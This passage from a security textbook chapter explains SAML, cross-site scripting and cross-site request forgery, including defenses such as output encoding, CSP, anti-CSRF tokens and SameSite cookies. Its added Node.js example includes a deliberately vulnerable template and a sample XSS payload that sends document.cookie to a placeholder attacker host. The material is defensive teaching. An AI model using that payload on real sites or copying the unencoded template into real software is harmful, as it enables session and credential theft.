364 Chapter 9 ■ Security Vulnerabilities, Threats, and Countermeasures
SAML is an XML-based standard for packaging and exchanging authentication and authorization statements (assertions) between security domains, usually over web protocols. It is commonly used to build web-based single sign-on (SSO), in which an identity provider vouches for a user to a service provider. If an attacker can forge or tamper with a SAML assertion, or steal a visitor's access token, they may be able to bypass authentication and gain unauthorized access to a site. The service provider must therefore verify an assertion's digital signature and check its intended audience and validity period before trusting it.
Cross-site scripting (XSS) is a code-injection attack in which an attacker gets script of their choosing into content that a web application sends to other visitors, so that the script runs in those visitors' browsers with the privileges of the site. The attacker does not need to compromise the web server itself: the injection usually succeeds because the application copies untrusted input (a URL parameter, a form field, a stored comment) into a page without encoding it. Reflected, stored, and DOM-based XSS are the main variants, and attackers also chain XSS with other weaknesses such as vulnerable Common Gateway Interface (CGI) scripts, unpatched web server software, SQL injection that writes script into stored data, frame exploitation, DNS redirects, and cookie hijacking. A successful XSS attack can result in identity theft, credential or session theft, data theft, financial losses, or the planting of remote-control software on visiting clients.
For the administrator of a website, the most important defense against XSS is to treat all input as untrusted on the server side: validate it for length and expected content, and, above all, encode it for the context in which it is output (HTML body, attribute, JavaScript, URL) so that metacharacters such as <, >, &, " and ' cannot change the structure of the page. A Content Security Policy header that restricts where scripts may be loaded from limits the damage if an injection slips through. Supporting measures include keeping the web server and application frameworks patched, deploying a web application firewall, running a host-based intrusion detection system (HIDS), and auditing for suspicious activity. As a web user, you can reduce your exposure by keeping your system and browser patched, running antivirus software, and avoiding nonmainstream websites. Browser add-ons such as NoScript for Firefox, and content blockers such as uBlock Origin, can restrict which sites are allowed to run scripts.
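The following is an added example, not code from the book: a small Node.js script that contrasts a template that interpolates an untrusted request parameter directly with one that HTML-encodes it first, adds an allowlist validator as a second layer, and builds a Content Security Policy header. The attacker payload and the "O'Brien" sample are constructed inputs; the hostnames are placeholders.

```javascript
// Added example (not from the book): why context-aware output encoding, not server
// patching, is the core XSS defense. Plain Node.js, no dependencies.

// Map the five characters that let untrusted text break out of an HTML text node
// or a quoted attribute value to their entity forms.
const HTML_ENTITIES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;",
};
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ENTITIES[c]);
}

// Vulnerable template: copies the untrusted "name" parameter straight into the page.
function renderVulnerable(name) {
  return `<p>Hello, ${name}!</p>`;
}

// Hardened template: identical markup, but the untrusted value is encoded for the
// HTML-body context before it is interpolated.
function renderSafe(name) {
  return `<p>Hello, ${escapeHtml(name)}!</p>`;
}

// Server-side input validation as a second layer, for a field with a known shape.
// The allowlist deliberately admits the apostrophe: "O'Brien" is a legitimate name,
// which is why validation alone cannot replace output encoding.
function validateUsername(name) {
  return typeof name === "string" && name.length > 0 && name.length <= 64
    && /^[A-Za-z0-9 .'-]+$/.test(name);
}

// A Content Security Policy that only allows scripts from the site's own origin;
// an injected inline <script> is blocked by the browser even if it reaches the page.
function contentSecurityPolicyHeader() {
  return "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'";
}

// Detect whether rendered HTML contains a script element the template never wrote.
function containsInjectedScript(html) {
  return /<script\b/i.test(html);
}

// Constructed attacker payload, of the kind a reflected-XSS link would carry
// (attacker.example is a placeholder host).
const PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>';

console.log("vulnerable:", renderVulnerable(PAYLOAD));
console.log("hardened:  ", renderSafe(PAYLOAD));
console.log("validation rejects payload:", !validateUsername(PAYLOAD));
```

Run it with `node xss.js`. The encoded output still shows the attacker's text to the user, but as inert characters; the browser never sees a script element. The validator is useful for fields with a known shape, but the apostrophe case shows why rejecting every metacharacter is not an option for free-text fields.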
Cross-site request forgery (XSRF, more commonly written CSRF) is related to XSS, but it targets the visiting user's browser rather than the website being visited. The attacker's goal is to trick the user, or the user's browser, into performing actions the user did not intend or would not have authorized: logging out of a session, changing account information, downloading account details, making a purchase or transfer, and so on. The attack works because a browser automatically attaches a site's cookies to any request sent to that site, even a request that a malicious page on another site caused the browser to send; the server cannot tell the forged request from a legitimate one unless it checks for something the attacker cannot supply. A related technique plants malware on the victim's system that stays dormant until a specific website is visited and then forges requests from inside the user's authenticated session, fooling the web server into performing malicious actions against the server and/or the client.
One well-known piece of malware that operated this way is Zeus, a banking trojan that hid on a victim's system until the user visited their online bank. It then read the account balance and account number from the authenticated session and sent those details to the controlling attacker, who would initiate an ACH money transfer to another bank. Strictly speaking this is a man-in-the-browser attack rather than a classic cross-site request forgery, because the forged requests come from malware on the victim's machine rather than from another website, but it is an example of malware that assists in stealing money directly from the victim's account.
Website administrators can protect against XSRF by requiring confirmation or reauthentication whenever a sensitive or risky action is requested by a connected client. This could include requiring the user to reenter their password, sending a code to the user via text message or email that must be provided back to the website, triggering a phone call-based verification, or solving a Completely Automated Public Turing Test to Tell Computers and Humans Apart (CAPTCHA), a mechanism to differentiate between humans and software robots. The standard technical control is an anti-CSRF token: an unpredictable random string (a nonce) that the server ties to the user's session, embeds in each form or state-changing URL, and checks on every such request; a page on an attacker's site cannot read the token and so cannot forge a valid request. Setting the SameSite attribute on the session cookie stops the browser from attaching the cookie to cross-site requests, and checking the Origin or Referer request header against the site's own origin rejects requests that a third-party page initiated.
End users can form more secure habits, such as running anti-malware scanners, using an HIDS, running a firewall, avoiding nonmainstream websites, always logging off from sites instead of simply closing the browser, closing the tab, or moving on to another URL, keeping browsers patched, and clearing out temporary files and cached cookies regularly.